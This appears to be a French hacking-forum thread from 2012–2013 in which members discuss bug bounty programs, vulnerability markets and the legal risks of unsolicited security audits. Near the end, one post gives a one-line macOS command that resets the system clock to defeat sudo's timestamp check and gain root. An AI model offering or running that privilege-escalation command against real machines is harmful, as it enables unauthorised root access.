+- N-PN White-Hat Project (https://dev.n-pn.fr/forum)
+-- Forum : Communauté (https://dev.n-pn.fr/forum/forumdisplay.php?fid=10)
+--- Forum : Le bistrot (https://dev.n-pn.fr/forum/forumdisplay.php?fid=17)
+--- Sujet : Être payé pour trouver des failles (/showthread.php?tid=2130)
Être payé pour trouver des failles - Di0Sasm - 13-08-2012
Je re-link jamais de liens venant d'autres forums, mais celui-là il pourrait en intéresser plusieurs,(habituellement je ne le fais jamais) mais s'il y'en qui ont besoin d'argent (même les autres) tout en restant White-Hat c'est le moment pour vous de faire voir vos connaissances acquises et les mettre en exploitation pour la bonne cause et j'insiste en étant payé.
Le liens http://www.rafayhackingarticles.net/2012/08/make-money-by-reporting-bugs-and.html
Source:Linux-Track
RE: Être payé pour trouver des failles - LR-6 - 13-08-2012
Pour PayPal apparement ça ne vaut pas le coup: http://www.reddit.com/r/netsec/comments/xwstl/paypal_bounty_program_dont_bother/
RE: Être payé pour trouver des failles - Di0Sasm - 13-08-2012
Sauf si tu bosse directement sur www.paypal.com,fr,de, etc.., là ils prennent en compte.
RE: Être payé pour trouver des failles - st0rm3 - 22-10-2012
C'est génial merci beaucoup je pense que je vais me mettre en mode pentest chez google ^^
RE: Être payé pour trouver des failles - LeuhVa - 14-05-2013
Y'a des belles rewards quand même
Je me souviens d'un certains blwood.net,qui avait réussi à trouver une faille upload sur skyblog(y'a qqes années,oui) et qu'avait pas toucher un copec il me semble ...
RE: Être payé pour trouver des failles - Ekroz - 14-05-2013
Je trouve l'idée intéressante. Ce qui attire les gens à pirater c'est souvent l'appât du gain (et également pour flatter l'égo).
Proposer de l'argent pour trouver des failles c'est encourager plus de monde à ne pas tout casser.
RE: Être payé pour trouver des failles - ﮎyиthﮎtyℓє - 15-08-2013
(14-05-2013, 13h11)Ekroz a écrit : Proposer de l'argent pour trouver des failles c'est encourager plus de monde à ne pas tout casser.oui et non, c'est à double tranchant, a combien estime tu ta sécurité et a combien ton ennemi estime ta sécurité ?
RE: Être payé pour trouver des failles - Ted - 16-08-2013
Il m'est déjà arrivée de contacter des entreprises en leurs exposant les différentes infos que j'ai pue récupérée et en leur proposant un rapport détaillé.
Mais il faut bien sur utiliser des système de paiement anonyme car il existe des histoires où le pentesteur ce fait prendre au piège.
RE: Être payé pour trouver des failles - ﮎyиthﮎtyℓє - 16-08-2013
Je ne croit pas qu'être payé en bitcoin (ou autre payement anonyme) sera en ta faveur dans ce cas la si il y a une plainte de déposé.
tu leur montre le mails comme quoi il t’on autorisé à audité leur appli et voilà, dans les dents, ils peuvent plus rien.
Sinon pareil, si vous contacté des entreprises pour des vulnérabilités, ne leur dites jamais 'j'ai trouvé des failles'
Passé par un discoure du genre, 'je pense que votre site est vulnérable et ce que je peut essayé quelques chose'
L'audit sauvage c'est illégale.
RE: Être payé pour trouver des failles - Ted - 16-08-2013
Tous a fait d'accord avec toi, seulement la plupart du temps que tu passe par un discours comme ton dernier, aucune réponse n'est faite ou l'email n'est pas pris en compte.
Après je serai une entreprise et l'on m'exposerai différentes données et l'on me proposerai de me les exposée pour ainsi les corriger je pense que je serai de bonne grâce mais d'après certaine histoire ce n'est pas toujours le cas.
RE: Être payé pour trouver des failles - ﮎyиthﮎtyℓє - 17-08-2013
ça c'est ton point de vue, quand j'envoi un email, en générale j'ai une réponse (quelle soit positive ou négative)
RE: Être payé pour trouver des failles - gruik - 17-08-2013
bon en même temps les concours d'ignorance c'est pas hyper intéressant non plus, déjà le dernier post datait de mai dernier mais celui d'avant datait de l'année dernière, déterrer un post useless pour l'alimenter...
y'a des marchés pour les failles, que ce soit des boites comme vupen qui vendent leurs 0days au gouvernement et aux entreprises, les entreprises elles mêmes qui appâtent les hackers les plus débiles avec quelques billets ou les blackmarkets russes où pour tout botnet acheté un rein d'enfant de 8 ans est offert en cadeau
les questions de pognon je vous dirais qu'on s'en fout sur n-pn, on est pas des commerciaux ou des marchands de tapis, on préfère en général parler informatique et technique, donc ne vous privez surtout pas...
RE: Être payé pour trouver des failles - ﮎyиthﮎtyℓє - 18-08-2013
ne crache jamais sur l'argent.
edit:
also: http://rt.com/news/facebook-post-exploit-hacker-zuckerberg-621/
RE: Être payé pour trouver des failles - infierno - 29-08-2013
Envie de passer root sur MacOS ?
sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su
RE: Être payé pour trouver des failles - gruik - 29-08-2013
